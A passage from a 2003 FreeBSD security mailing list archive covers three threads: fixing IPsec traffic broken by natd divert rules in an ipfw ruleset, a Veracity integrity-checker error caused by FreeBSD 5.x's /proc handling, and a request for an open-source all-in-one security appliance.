From owner-freebsd-security@FreeBSD.ORG Fri Oct 31 11:13:38 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CDC8C16A4CE; Fri, 31 Oct 2003 11:13:38 -0800 (PST) Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [204.127.198.35]) by mx1.FreeBSD.org (Postfix) with ESMTP id A8F3E43FA3; Fri, 31 Oct 2003 11:13:37 -0800 (PST) (envelope-from cristjc@comcast.net) Received: from blossom.cjclark.org (12-234-156-182.client.attbi.com[12.234.156.182]) by comcast.net (rwcrmhc11) with ESMTP id <2003103119133701300pcp02e>; Fri, 31 Oct 2003 19:13:37 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.9p2/8.12.8) with ESMTP id h9VJDusb067212; Fri, 31 Oct 2003 11:13:56 -0800 (PST) (envelope-from cristjc@comcast.net) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.9p2/8.12.9/Submit) id h9VJDtam067211; Fri, 31 Oct 2003 11:13:55 -0800 (PST) (envelope-from cristjc@comcast.net) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to cristjc@comcast.net using -f Date: Fri, 31 Oct 2003 11:13:55 -0800 From: "Crist J. Clark" To: security@freebsd.org, net@freebsd.org Message-ID: <20031031191355.GA67124@blossom.cjclark.org> References: <20031030210509.GA667@omoikane.mb.skyweb.ca> <20031030224342.GA32640@blossom.cjclark.org> <20031031154525.GA985@omoikane.mb.skyweb.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20031031154525.GA985@omoikane.mb.skyweb.ca> User-Agent: Mutt/1.4.1i X-URL: http://people.freebsd.org/~cjc/ X-Mailman-Approved-At: Mon, 03 Nov 2003 03:39:58 -0800 Subject: Re: (long) Re: Using racoon-negotiated IPSec with ipfw and natd X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: cjclark@alum.mit.edu List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 31 Oct 2003 19:13:39 -0000 On Fri, Oct 31, 2003 at 09:45:25AM -0600, Mark Johnston wrote: > "Crist J. Clark" wrote: > > On Thu, Oct 30, 2003 at 03:05:09PM -0600, Mark Johnston wrote: > > > - gateway receives an ESP packet from mobile (encapsulating a ping). > > > - gateway decrypts and transmits an ICMP packet to internal with mobile's > > > source address. > > > - internal generates the ICMP response to mobile. > > > - gateway receives the response, runs it through natd, and sends it out in the > > > clear to mobile with gateway's source address. > > > > This shouldn't happen. IPsec processing of the outgoing packet happens > > _before_ it gets passed to ipfw(8) (which hands it to natd(8)) on the > > external interface. > > That's odd. To simplify the situation a bit, I'm testing with a static > SP/SA set. The SPs in place are: > > 172.21.0.0/16[any] 192.168.15.0/24[any] any > in ipsec > esp/tunnel/remoteext-localext/require > spid=122 seq=1 pid=12464 > refcnt=1 > 192.168.15.0/24[any] 172.21.0.0/16[any] any > out ipsec > esp/tunnel/localext-remoteext/require > spid=121 seq=0 pid=12464 > refcnt=1 > > (The external IPs are missing but the rest is unchanged.) > > I can break and fix the connection by adding and removing firewall rules > allowing the traffic before the natd divert. > > > > What I want to > > > accomplish, in pseudo-ipfw, is this: > > > > > > pass esp from any to me > > > pass ip from known-sp-sources to 192.168.0.0/24 > > > pass ip from 192.168.0.0/24 to known-sp-destinations > > > divert natd from 192.168.0.0/24 to any > > > > This may be your problem. That rule should be something like, > > > > divert natd from 192.168.0.0/24 to any via ${external_if} > > > > Is that what you actually have? Are you doing NAT on the internal > > interface? That would confuse things. > > I'm not sure what you mean by "doing NAT". The natd interface (-n) is the > external one, but I'm diverting to natd using a recv rule on the internal > interface. Yep, that's the problem. When I ask where you are "doing NAT" I'm saying on which interface the ipfw(8) rules pass packets to natd(8). You're doing NAT all over the place. That's definately what is causing the problem here. For packets entering the system from the network, the processing order is, (network) ---> ipfw ---> IPsec ---> (remainder of IP stack) And outgoing, (system) ---> IPsec ---> ipfw ---> (network) (It's actually a bit more hairy that that, incoming IPsec processed packets actually get reinjected into the stack below ipfw processing, but skip ipfw on the second pass, unless IPSEC_FILTERGIF is set.) Notice I didn't explicitly say where natd(8) happens because ipfw(8) passes packets to natd(8) and that is completely under your control. The problem is that the addresses on the packets has been rewritten before they are being set out the external interface where IPsec processing would happen. > The natd setup is a bit hairy, because the box has a DMZ > interface (dc0) along with external (fxp0) and internal (txp0) NICs, which > is bridged (dc0-fxp0) instead of routed to match a legacy config. Here's > my current ipfw setup: > > 00100 allow esp from any to me > 00200 allow ah from any to me > 00205 allow udp from any to me dst-port 500 > 00210 allow ip from 192.168.15.0/24 to 172.21.0.0/16 > 00220 allow ip from 172.21.0.0/16 to 192.168.15.0/24 > [ more bidirectional allow rules ] > 00300 deny ip from any to 192.168.15.0/24 in recv fxp0 > 00400 deny ip from any to 192.168.15.0/24 in recv dc0 > 00500 divert 8669 ip from 192.168.15.0/24 to not me recv txp0 > 00600 divert 8668 ip from any to me in recv fxp0 > 00700 divert 8668 ip from any to me in recv dc0 > 00800 allow ip from 192.168.15.0/24 to any recv txp0 > 00900 allow ip from any to 192.168.15.0/24 > 01000 check-state > [ some allows and denies for fxp0<->dc0 ] > 01800 allow ip from 192.168.15.0/24 to me > 01900 allow ip from me to any keep-state > 65535 deny ip from any to any > > Because of the DMZ, I had to tweak the natd setup to use -i 8668 -o 8669 > - if I diverted everything to 8668 and didn't use -i and -o, it was > interpreting dc0 as "inside", and I couldn't communicate with the DMZ from > the LAN. Ouch. Mixing bridging, NAT, and IPsec. (I should talk, my bastion host at home has one interface with my coax cable connection, another to my NATed LAN, another to my NATed WLAN which also is all tunneled through IPsec or PPTP since WEP is broken, and finally some PPP dial-up interfaces to call into the office. No bridging there, though! Only bridge on test boxes on the internal LAN.) I don't understand is what breaks if you just do, 500 divert natd ip from 192.168.15.0/24 to any out via fxp0 600 divert natd ip from any to me in via fxp0 And lose 700. Is there a reason to NAT stuff between the internal network and DMZ? > With these rules in place, everything works fine, and I can ping across > the IPsec link. If I delete 210 and 220, I start to see the pings on fxp0 > destined to the 172.21.x.x address from my external IP. Exactly, with those rules, you never hit the 'divert' rules on the internal interface. The packets get processed with their original IP addresses as they go out fxp0, the IPsec policy is applied, and all works well. Without those rules, they hit the divert rule as they come in the internal interface, get the source address rewritten, and then do not match the IPsec policy when they get processed on the way out fxp0. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org From owner-freebsd-security@FreeBSD.ORG Mon Nov 3 09:05:33 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2BCC416A4CE; Mon, 3 Nov 2003 09:05:33 -0800 (PST) Received: from omoikane.mb.skyweb.ca (209-5-243-50.mb.skyweb.ca [209.5.243.50]) by mx1.FreeBSD.org (Postfix) with ESMTP id 388FA43F93; Mon, 3 Nov 2003 09:05:32 -0800 (PST) (envelope-from mark@skyweb.ca) Received: by omoikane.mb.skyweb.ca (Postfix, from userid 1001) id 629B762761; Mon, 3 Nov 2003 11:05:32 -0600 (CST) Date: Mon, 3 Nov 2003 11:05:32 -0600 From: Mark Johnston To: cjclark@alum.mit.edu Message-ID: <20031103170532.GA669@omoikane.mb.skyweb.ca> Mail-Followup-To: cjclark@alum.mit.edu, security@freebsd.org, net@freebsd.org References: <20031030210509.GA667@omoikane.mb.skyweb.ca> <20031030224342.GA32640@blossom.cjclark.org> <20031031154525.GA985@omoikane.mb.skyweb.ca> <20031031191355.GA67124@blossom.cjclark.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20031031191355.GA67124@blossom.cjclark.org> User-Agent: Mutt/1.4.1i cc: net@freebsd.org cc: security@freebsd.org Subject: Re: [solved] Using racoon-negotiated IPSec with ipfw and natd X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 03 Nov 2003 17:05:33 -0000 "Crist J. Clark" wrote: > For packets entering the system from the network, the processing > order is, > > (network) ---> ipfw ---> IPsec ---> (remainder of IP stack) > > And outgoing, > > (system) ---> IPsec ---> ipfw ---> (network) > > (It's actually a bit more hairy that that, incoming IPsec processed > packets actually get reinjected into the stack below ipfw processing, > but skip ipfw on the second pass, unless IPSEC_FILTERGIF is set.) > Notice I didn't explicitly say where natd(8) happens because ipfw(8) > passes packets to natd(8) and that is completely under your control. > > The problem is that the addresses on the packets has been rewritten > before they are being set out the external interface where IPsec > processing would happen. Perfect! Thank you! That's exactly the explanation I needed. > Ouch. Mixing bridging, NAT, and IPsec. (I should talk, my bastion host > at home has one interface with my coax cable connection, another to my > NATed LAN, another to my NATed WLAN which also is all tunneled through > IPsec or PPTP since WEP is broken, and finally some PPP dial-up > interfaces to call into the office. No bridging there, though! Only > bridge on test boxes on the internal LAN.) > > I don't understand is what breaks if you just do, > > 500 divert natd ip from 192.168.15.0/24 to any out via fxp0 > 600 divert natd ip from any to me in via fxp0 > > And lose 700. Is there a reason to NAT stuff between the internal > network and DMZ? There is - I'm not the DMZ's gateway, and NAT means not having to add static routes to all the DMZ boxes. The legacy box that this is replacing (a 3Com SuperStack 3000-series firewall appliance) actually allowed packets to DMZ hosts by responding to ARPs for their IPs on the WAN port, then invisibly proxying packets to them, and doing the same trick for DMZ-WAN traffic. I avoided that fate by bridging, but reconfiguring the remote box that actually is the DMZ gateway wasn't an option. For the archives: Dynamic (roaming) IPsec was not working with racoon on a firewall also running natd. The problem was that natd was rewriting the packets as they came in, because of an ipfw rule matching on the internal interface, and by the time the packets made it to the IPsec layer, they no longer matched the SP. It was fixed by changing the ipfw rule to match only outgoing packets, which will already have been processed by IPsec by the time they get to ipfw on the trip out. Specifically, I've made one tiny change to my ruleset. I replaced this rule: 00500 divert 8669 ip from 192.168.15.0/24 to not me recv txp0 with this: 00500 divert 8669 ip from 192.168.15.0/24 to not me out recv txp0 Adding "out" prevents ipfw from diverting the packet to natd on its way in. On the way out, the packet has been through IPsec and will no longer match the "from 192.168.15.0/24" criterion, saving it from diversion again. If you don't also use a DMZ with bridging, you can do it a lot more easily, as Crist describes above. Thanks a lot for your help, Mark From owner-freebsd-security@FreeBSD.ORG Tue Nov 4 06:18:15 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 05FB216A4CE for ; Tue, 4 Nov 2003 06:18:15 -0800 (PST) Received: from mail.hwi.buffalo.edu (cliff.hwi.buffalo.edu [128.205.85.74]) by mx1.FreeBSD.org (Postfix) with SMTP id AD1D143FE0 for ; Tue, 4 Nov 2003 06:18:13 -0800 (PST) (envelope-from rcollins@hwi.buffalo.edu) Received: (qmail 88779 invoked by uid 90); 4 Nov 2003 14:18:13 -0000 Received: from rcollins@hwi.buffalo.edu by cliff.hwi.buffalo.edu by uid 82 with qmail-scanner-1.20rc3 (vexira: 6.22.0.1. Clear:RC:1:. Processed in 0.159031 secs); 04 Nov 2003 14:18:12 -0000 Received: from unknown (HELO banshee) (128.205.85.104) by 128.205.85.8 with SMTP; 4 Nov 2003 14:18:12 -0000 Message-ID: <001901c3a2de$7ab72c10$6855cd80@dhcp.hwi.buffalo.edu> From: "Robert Collins" To: Date: Tue, 4 Nov 2003 09:18:12 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1158 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Subject: Veractiy and FreeBSD X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 04 Nov 2003 14:18:15 -0000 I'm trying to get veracity (http://www.rocksoft.com/veracity/), a tripwire replacement, working on FreeBSD 5.x. When I try and create a snapshot I get the following error for files sitting on my root partition: -- snip snip -- csh.logout E: Error opening binary (B) stream of file "/etc/csh.logout". (OS error message="File is on the procfs (/proc) device."). E: Could not obtain attribute B.md5 for this file. -- snip snip -- I've tried taking both PROCFS and PSEUDOFS out of the kernel, to no avail. Anyone have any other ideas? Thanks -rcollins From owner-freebsd-security@FreeBSD.ORG Tue Nov 4 10:09:33 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A6F2616A4CE for ; Tue, 4 Nov 2003 10:09:33 -0800 (PST) Received: from obsecurity.dyndns.org (adsl-63-207-60-234.dsl.lsan03.pacbell.net [63.207.60.234]) by mx1.FreeBSD.org (Postfix) with ESMTP id C291A43FA3 for ; Tue, 4 Nov 2003 10:09:32 -0800 (PST) (envelope-from kris@obsecurity.org) Received: from rot13.obsecurity.org (rot13.obsecurity.org [10.0.0.5]) by obsecurity.dyndns.org (Postfix) with ESMTP id 9EE3466B9B; Tue, 4 Nov 2003 10:09:32 -0800 (PST) Received: by rot13.obsecurity.org (Postfix, from userid 1000) id 7CDFEDAF; Tue, 4 Nov 2003 10:09:32 -0800 (PST) Date: Tue, 4 Nov 2003 10:09:32 -0800 From: Kris Kennaway To: Robert Collins Message-ID: <20031104180932.GA70958@rot13.obsecurity.org> References: <001901c3a2de$7ab72c10$6855cd80@dhcp.hwi.buffalo.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="qDbXVdCdHGoSgWSk" Content-Disposition: inline In-Reply-To: <001901c3a2de$7ab72c10$6855cd80@dhcp.hwi.buffalo.edu> User-Agent: Mutt/1.4.1i cc: freebsd-security@freebsd.org Subject: Re: Veractiy and FreeBSD X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 04 Nov 2003 18:09:33 -0000 --qDbXVdCdHGoSgWSk Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Nov 04, 2003 at 09:18:12AM -0500, Robert Collins wrote: > I'm trying to get veracity (http://www.rocksoft.com/veracity/), a tripwire > replacement, working on FreeBSD 5.x. When I try and create a snapshot I g= et > the following error for files sitting on my root partition: >=20 > -- snip snip -- >=20 > csh.logout > E: Error opening binary (B) stream of file > "/etc/csh.logout". > (OS error message=3D"File is on the procfs (/proc) device."). > E: Could not obtain attribute B.md5 for this file. >=20 > -- snip snip -- >=20 > I've tried taking both PROCFS and PSEUDOFS out of the kernel, to no avail. > Anyone have any other ideas? Talk to the authors? Kris --qDbXVdCdHGoSgWSk Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (FreeBSD) iD8DBQE/p+tcWry0BWjoQKURAh2YAKDvG3q2YBfWLRWlryV1IJOe/4xhxgCg+lN2 U94iC/D/tNMoHWhAzXX7/+A= =e0R6 -----END PGP SIGNATURE----- --qDbXVdCdHGoSgWSk-- From owner-freebsd-security@FreeBSD.ORG Tue Nov 4 12:19:26 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7397F16A4CE for ; Tue, 4 Nov 2003 12:19:26 -0800 (PST) Received: from smtp803.mail.ukl.yahoo.com (smtp803.mail.ukl.yahoo.com [217.12.12.140]) by mx1.FreeBSD.org (Postfix) with SMTP id 2F07B43FE9 for ; Tue, 4 Nov 2003 12:19:25 -0800 (PST) (envelope-from fscked@pacbell.net) Received: from adsl-67-120-106-74.dsl.snfc21.pacbell.net (HELO pacbell.net) (fscked@pacbell.net@67.120.106.74 with plain) by smtp1.bt.mail.vip.ukl.yahoo.com with SMTP; 4 Nov 2003 20:19:24 -0000 Message-ID: <3FA809A9.3030109@pacbell.net> Date: Tue, 04 Nov 2003 12:18:49 -0800 From: richard childers / kg6hac User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax) X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-security@freebsd.org References: <20031104200122.1FE8016A4EC@hub.freebsd.org> In-Reply-To: <20031104200122.1FE8016A4EC@hub.freebsd.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Subject: Re: veracity & freebsd (freebsd-security Digest, Vol 32, Issue 2) X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 04 Nov 2003 20:19:26 -0000 >I'm trying to get veracity (http://www.rocksoft.com/veracity/), a tripwire >replacement, working on FreeBSD 5.x. When I try and create a snapshot I get >the following error for files sitting on my root partition: > >-- snip snip -- > > csh.logout > E: Error opening binary (B) stream of file > "/etc/csh.logout". > (OS error message="File is on the procfs (/proc) device."). > E: Could not obtain attribute B.md5 for this file. > >-- snip snip -- > I wonder if Veracity(tm) originated in a UNIX environment? Regards, Richard Childers / Senior Engineer Daemonized Networking Services https://www.daemonized.com (415) 759-5571 From owner-freebsd-security@FreeBSD.ORG Tue Nov 4 16:47:23 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C5E2516A4CE for ; Tue, 4 Nov 2003 16:47:23 -0800 (PST) Received: from mail.hwi.buffalo.edu (cliff.hwi.buffalo.edu [128.205.85.74]) by mx1.FreeBSD.org (Postfix) with SMTP id 4D4B243FBD for ; Tue, 4 Nov 2003 16:47:20 -0800 (PST) (envelope-from rcollins@hwi.buffalo.edu) Received: (qmail 21431 invoked by uid 90); 5 Nov 2003 00:47:16 -0000 Received: from rcollins@hwi.buffalo.edu by cliff.hwi.buffalo.edu by uid 82 with qmail-scanner-1.20rc3 (vexira: 6.22.0.1. Clear:RC:1:. Processed in 0.016217 secs); 05 Nov 2003 00:47:16 -0000 Received: from unknown (HELO mail.hwi.buffalo.edu) (127.0.0.1) by localhost with SMTP; 5 Nov 2003 00:47:16 -0000 Received: from 141.149.242.190 (SquirrelMail authenticated user rcollins) by mail.hwi.buffalo.edu with HTTP; Tue, 4 Nov 2003 19:47:16 -0500 (EST) Message-ID: <4529.141.149.242.190.1067993236.squirrel@mail.hwi.buffalo.edu> In-Reply-To: <20031104180932.GA70958@rot13.obsecurity.org> References: <001901c3a2de$7ab72c10$6855cd80@dhcp.hwi.buffalo.edu> <20031104180932.GA70958@rot13.obsecurity.org> Date: Tue, 4 Nov 2003 19:47:16 -0500 (EST) From: "Robert Collins" To: "Kris Kennaway" User-Agent: SquirrelMail/1.4.2 MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 Importance: Normal cc: freebsd-security@freebsd.org Subject: Re: Veractiy and FreeBSD X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 05 Nov 2003 00:47:23 -0000 > On Tue, Nov 04, 2003 at 09:18:12AM -0500, Robert Collins wrote: >> I'm trying to get veracity (http://www.rocksoft.com/veracity/), a >> tripwire >> replacement, working on FreeBSD 5.x. When I try and create a snapshot I >> get >> the following error for files sitting on my root partition: >> >> -- snip snip -- >> >> csh.logout >> E: Error opening binary (B) stream of file >> "/etc/csh.logout". >> (OS error message="File is on the procfs (/proc) device."). >> E: Could not obtain attribute B.md5 for this file. >> >> -- snip snip -- >> >> I've tried taking both PROCFS and PSEUDOFS out of the kernel, to no >> avail. >> Anyone have any other ideas? > > Talk to the authors? > Kris, The last line of my e-mail was originally "Anyone have any other ideas before I go back to trying to contact their non-existant technical support?" But I figured I would be nice. :) I spoke to someone from rocksoft, but it's a long uninformative story. Thanks for the idea though. -rcollins From owner-freebsd-security@FreeBSD.ORG Tue Nov 4 17:28:31 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C342216A4CF for ; Tue, 4 Nov 2003 17:28:31 -0800 (PST) Received: from smtp0.adl1.internode.on.net (smtp0.adl1.internode.on.net [203.16.214.194]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3C55843FDF for ; Tue, 4 Nov 2003 17:28:28 -0800 (PST) (envelope-from kim.needham@rocksoft.com) Received: from Lappy.rocksoft.com (eth1083.sa.adsl.internode.on.net [150.101.233.58])hA51SQPu054475; Wed, 5 Nov 2003 11:58:26 +1030 (CST) Message-Id: <5.2.0.9.0.20031105114806.00b34b98@mail.chariot.net.au> X-Sender: kim@mail.rocksoft.com (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Wed, 05 Nov 2003 11:58:21 +1030 To: "Robert Collins" From: Kim Needham In-Reply-To: <4529.141.149.242.190.1067993236.squirrel@mail.hwi.buffalo. edu> References: <20031104180932.GA70958@rot13.obsecurity.org> <001901c3a2de$7ab72c10$6855cd80@dhcp.hwi.buffalo.edu> <20031104180932.GA70958@rot13.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Mailman-Approved-At: Wed, 05 Nov 2003 03:35:15 -0800 cc: freebsd-security@freebsd.org Subject: Re: Veractiy and FreeBSD X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 05 Nov 2003 01:28:31 -0000 This is caused by a check that determines if the /proc filesystem is on the same device as the file being read to prevent reading in files of infinite length. Since FreeBSD 5.x seems to no longer use a mounted proc filesystem but proc is mounted on the root device, this check will need to be removed for FreeBSD 5.x. In theory you could remove the /proc directory though I have no idea what bad effects that will have, especially if you are using anything that runs in compatibility mode. (Someone more up to date with the changes to FreeBSD 5.x could inform you as to the problems this may cause) Otherwise we will have a new version shortly that will have this problem corrected. Kim Needham (kim.needham@rocksoft.com) Network Engineer, Rocksoft Limited. Ph: +61 8 8232 6262 Fax: +61 8 8232 6264 http://www.rocksoft.com/ Protect your files with Veracity data integrity: http://www.veracity.com/ > > On Tue, Nov 04, 2003 at 09:18:12AM -0500, Robert Collins wrote: > >> I'm trying to get veracity (http://www.rocksoft.com/veracity/), a > >> tripwire > >> replacement, working on FreeBSD 5.x. When I try and create a snapshot I > >> get > >> the following error for files sitting on my root partition: > >> > >> -- snip snip -- > >> > >> csh.logout > >> E: Error opening binary (B) stream of file > >> "/etc/csh.logout". > >> (OS error message="File is on the procfs (/proc) device."). > >> E: Could not obtain attribute B.md5 for this file. > >> > >> -- snip snip -- > >> > >> I've tried taking both PROCFS and PSEUDOFS out of the kernel, to no > >> avail. > >> Anyone have any other ideas? > > > > Talk to the authors? > > > >Kris, > >The last line of my e-mail was originally "Anyone have any other ideas >before I go back to trying to contact their non-existant technical >support?" But I figured I would be nice. :) > >I spoke to someone from rocksoft, but it's a long uninformative story. > >Thanks for the idea though. >-rcollins >_______________________________________________ >freebsd-security@freebsd.org mailing list >http://lists.freebsd.org/mailman/listinfo/freebsd-security >To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" From owner-freebsd-security@FreeBSD.ORG Wed Nov 5 03:48:25 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AEFEE16A4CE for ; Wed, 5 Nov 2003 03:48:25 -0800 (PST) Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by mx1.FreeBSD.org (Postfix) with ESMTP id 838B443FE9 for ; Wed, 5 Nov 2003 03:48:24 -0800 (PST) (envelope-from sheldonh@starjuice.net) Received: from sheldonh by axl.seasidesoftware.co.za with local (Exim 4.24; FreeBSD 5.1) id 1AHM97-0004Xc-H4; Wed, 05 Nov 2003 13:48:21 +0200 Date: Wed, 5 Nov 2003 13:48:21 +0200 From: Sheldon Hearn To: Kim Needham Message-ID: <20031105114821.GZ73736@starjuice.net> Mail-Followup-To: Kim Needham , freebsd-security@freebsd.org References: <20031104180932.GA70958@rot13.obsecurity.org> <001901c3a2de$7ab72c10$6855cd80@dhcp.hwi.buffalo.edu> <20031104180932.GA70958@rot13.obsecurity.org> <5.2.0.9.0.20031105114806.00b34b98@mail.chariot.net.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5.2.0.9.0.20031105114806.00b34b98@mail.chariot.net.au> User-Agent: Mutt/1.5.4i Sender: Sheldon Hearn cc: freebsd-security@freebsd.org Subject: Re: Veractiy and FreeBSD X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 05 Nov 2003 11:48:25 -0000 On (2003/11/05 11:58), Kim Needham wrote: > This is caused by a check that determines if the /proc filesystem is on > the same device as the file being read to prevent reading in files of > infinite length. > Since FreeBSD 5.x seems to no longer use a mounted proc filesystem but proc > is mounted on the root device, this check will need to be removed for > FreeBSD 5.x. That doesn't sound like a "long uninformative story". Thanks for the feedback. Vendor support of FreeBSD is always appreciated. :-) Ciao, Sheldon. From owner-freebsd-security@FreeBSD.ORG Wed Nov 5 10:02:02 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5179F16A4CE for ; Wed, 5 Nov 2003 10:02:02 -0800 (PST) Received: from web60408.mail.yahoo.com (web60408.mail.yahoo.com [216.109.118.191]) by mx1.FreeBSD.org (Postfix) with SMTP id 5096B43FBF for ; Wed, 5 Nov 2003 10:02:01 -0800 (PST) (envelope-from twigles@yahoo.com) Message-ID: <20031105180158.48435.qmail@web60408.mail.yahoo.com> Received: from [68.5.49.41] by web60408.mail.yahoo.com via HTTP; Wed, 05 Nov 2003 10:01:58 PST Date: Wed, 5 Nov 2003 10:01:58 -0800 (PST) From: twig les To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Subject: FBSD All-in-one security box? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 05 Nov 2003 18:02:02 -0000 Hey *, as I sweat through another day of crap dealing with an all-in-one box (firewall, IDS, AVS, report generating, soon to be a VPN server) I'm wondering if someone has started a project to put some freeware together in some semblance of sanity on a FBSD box. There's basically nothing that this box does that a combo of IPFW (or another bsd filter), snort, ntop, and some other freeware stuff can't do. As usual the problems I face stem from feature-overload, since the vendor has one crappy feature and then adds another crappy feature instead of fixing the first one so they can market the box better. I'm thinking that since the tools I mentioned are already fairly mature and robust, all that's needed is some sewing and, when core functionality is achieved, a GUI. This sounds like a fun project IMO, but I don't want to re-invent the wheel, especially when I have no spare time. ===== ----------------------------------------------------------- Get a taste of Religion ... eat a priest! ----------------------------------------------------------- __________________________________ Do you Yahoo!? Protect your identity with Yahoo! Mail AddressGuard http://antispam.yahoo.com/whatsnewfree From owner-freebsd-security@FreeBSD.ORG Wed Nov 5 10:10:11 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 93FF616A4CE for ; Wed, 5 Nov 2003 10:10:11 -0800 (PST) Received: from amsfep16-int.chello.nl (amsfep16-int.chello.nl [213.46.243.26]) by mx1.FreeBSD.org (Postfix) with ESMTP id E2E1343FBF for ; Wed, 5 Nov 2003 10:10:09 -0800 (PST) (envelope-from dodell@sitetronics.com) Received: from sitetronics.com ([213.46.142.207]) by amsfep16-int.chello.nl ESMTP <20031105180945.VAFA17017.amsfep16-int.chello.nl@sitetronics.com>; Wed, 5 Nov 2003 19:09:45 +0100 Message-ID: <3FA93CD1.1080508@sitetronics.com> Date: Wed, 05 Nov 2003 19:09:21 +0100 From: "Devon H. O'Dell" User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.4) Gecko/20030820 X-Accept-Language: en-us, en MIME-Version: 1.0 Cc: freebsd-security@freebsd.org References: <20031105180158.48435.qmail@web60408.mail.yahoo.com> In-Reply-To: <20031105180158.48435.qmail@web60408.mail.yahoo.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Subject: Re: FBSD All-in-one security box? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , 